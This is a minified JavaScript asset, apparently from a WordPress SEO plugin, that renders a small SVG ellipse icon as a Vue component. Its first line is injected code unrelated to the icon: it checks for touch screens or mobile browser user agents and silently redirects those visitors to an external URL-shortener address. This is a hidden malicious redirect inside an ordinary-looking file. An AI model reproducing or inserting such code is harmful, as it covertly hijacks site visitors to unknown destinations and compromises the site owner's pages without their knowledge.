(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as t,j as e}from"./vendor-vue-ui.232c7c36.js";const s={},l={viewBox:"0 0 6 6",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-ellipse"};function c(a,n){return r(),t("svg",l,[...n[0]||(n[0]=[e("circle",{r:"2",transform:"matrix(-1 0 0 1 3 3)",fill:"currentColor",stroke:"currentColor","stroke-width":"2"},null,-1)])])}const p=o(s,[["render",c]]);export{p as S};
